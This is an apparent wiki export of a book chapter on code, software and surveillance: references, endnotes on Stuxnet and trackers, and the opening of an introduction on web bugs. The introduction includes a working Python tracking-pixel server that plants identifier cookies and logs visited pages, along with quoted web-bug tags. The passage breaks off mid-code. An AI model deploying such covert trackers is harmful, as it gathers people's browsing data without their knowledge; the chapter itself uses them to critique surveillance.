EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4993</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4993"/>
		<updated>2012-06-21T11:05:42Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media, if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. 
That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012). &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages we browse. Often held within a tiny one-pixel frame or image, far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behaviour, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally specified as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] In the Ghostery log, the [http://chartbeat.com/ ChartBeat company] is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
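To make the cookie mechanism described above concrete, the following is a minimal sketch in Python of the server side of such a tracking pixel: it serves the classic one-pixel ‘clear GIF’ and plants a persistent identifier cookie, logging the Referer header so that each page embedding the image is recorded against that identifier. The cookie name, port and logging here are hypothetical simplifications of my own, not the code of ChartBeat or any actual tracker. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Minimal sketch of a 'web bug' server: serves a 1x1 transparent GIF,
# sets a persistent identifier cookie, and logs which page embedded it.
# Purely illustrative; cookie name and port are hypothetical.
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

# The classic 43-byte transparent 1x1 GIF, the 'clear GIF' payload
PIXEL = (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00'
         b'!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01'
         b'\x00\x00\x02\x02D\x01\x00;')

class WebBug(BaseHTTPRequestHandler):
    def do_GET(self):
        # Reuse the visitor's cookie if present, otherwise mint a new ID
        cookie = self.headers.get('Cookie', '')
        if 'uid=' in cookie:
            uid = cookie.split('uid=')[1].split(';')[0]
        else:
            uid = uuid.uuid4().hex
        # The Referer header reveals which page embedded the pixel
        print('visitor', uid, 'viewed', self.headers.get('Referer', 'unknown'))
        self.send_response(200)
        self.send_header('Content-Type', 'image/gif')
        self.send_header('Set-Cookie', 'uid=%s; Max-Age=31536000' % uid)
        self.end_headers()
        self.wfile.write(PIXEL)

HTTPServer(('', 8080), WebBug).serve_forever()
&amp;lt;/pre&amp;gt; &lt;br /&gt;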
Web bugs perform these analytics by running code in the browser without the knowledge of the user, code which, if observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
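The second of these examples repays unpacking: everything after the question mark in the ‘image’ URL is an encoded report about the user, assembled in the page and carried to the tracker's server when the browser requests the image. The short Python sketch below rebuilds that query string from its parts; the interpretations in the comments are my own reading of the EFF example. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# How the data in the second EFF web bug above is assembled: the query
# string of the 'image' URL is an encoded report of what the user just did.
from urllib.parse import urlencode

report = {
    'ML_SD': 'IntuitTE_Intuit_1x1_RunOfSite_Any',  # campaign/site identifier
    'db_afcr': '4B31-C2FB-10E2C',                  # user/account identifier
    'event': 'reghome',                            # what the user did
    'group': 'register',
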